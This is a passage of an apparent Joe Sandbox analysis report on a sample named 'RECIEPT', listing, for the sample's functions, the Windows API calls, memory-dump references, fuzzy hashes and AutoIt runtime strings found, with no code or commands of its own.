                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 1038674560-2734436370
                                        • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                        • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                        • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                        • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                        • LoadStringW.USER32(00000000), ref: 00434060
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                        • LoadStringW.USER32(00000000), ref: 00434078
                                        • _wprintf.LIBCMT ref: 004340A1
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wprintf
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 3648134473-3128320259
                                        • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                        • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                        • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                        • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                        • __lock.LIBCMT ref: 00417981
                                          • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                          • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                          • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                        • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                        • __lock.LIBCMT ref: 004179A2
                                        • ___addlocaleref.LIBCMT ref: 004179C0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                        • String ID: KERNEL32.DLL$pI
                                        • API String ID: 637971194-197072765
                                        • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                        • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                        • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                        • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove$_malloc
                                        • String ID:
                                        • API String ID: 1938898002-0
                                        • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                        • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                        • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                        • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                        • _memmove.LIBCMT ref: 0044B555
                                        • _memmove.LIBCMT ref: 0044B578
                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                        • String ID:
                                        • API String ID: 2737351978-0
                                        • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                        • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                        • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                        • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                        • __calloc_crt.LIBCMT ref: 00415246
                                        • __getptd.LIBCMT ref: 00415253
                                        • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                        • _free.LIBCMT ref: 0041529E
                                        • __dosmaperr.LIBCMT ref: 004152A9
                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                        • String ID:
                                        • API String ID: 3638380555-0
                                        • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                        • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                        • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                        • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 0046C96E
                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Variant$Copy$ClearErrorInitLast
                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                        • API String ID: 3207048006-625585964
                                        • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                        • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                        • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                        • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                        APIs
                                        • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                        • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                        • gethostbyname.WSOCK32(?), ref: 004655A6
                                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                        • _memmove.LIBCMT ref: 004656CA
                                        • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                        • WSACleanup.WSOCK32 ref: 00465762
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                        • String ID:
                                        • API String ID: 2945290962-0
                                        • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                        • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                        • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                        • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                        APIs
                                        • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                        • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                        • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                        • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                        • String ID:
                                        • API String ID: 1457242333-0
                                        • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                        • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                        • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                        • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                        APIs
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ConnectRegistry_memmove_wcslen
                                        • String ID:
                                        • API String ID: 15295421-0
                                        • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                        • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                        • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                        • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                        APIs
                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                        • _wcstok.LIBCMT ref: 004675B2
                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                        • _wcscpy.LIBCMT ref: 00467641
                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                        • _wcslen.LIBCMT ref: 00467793
                                        • _wcslen.LIBCMT ref: 004677BD
                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                        • String ID: X
                                        • API String ID: 780548581-3081909835
                                        • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                        • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                        • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                        • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                        APIs
                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                        • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                        • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                        • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                        • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                        • CloseFigure.GDI32(?), ref: 0044751F
                                        • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                        • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                        • String ID:
                                        • API String ID: 4082120231-0
                                        • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                        • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                        • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                        • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                        APIs
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                        • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                        • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                        • String ID:
                                        • API String ID: 2027346449-0
                                        • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                        • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                        • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                        • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                        APIs
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                        • GetMenu.USER32 ref: 0047A703
                                        • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                        • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                        • _wcslen.LIBCMT ref: 0047A79E
                                        • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                        • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
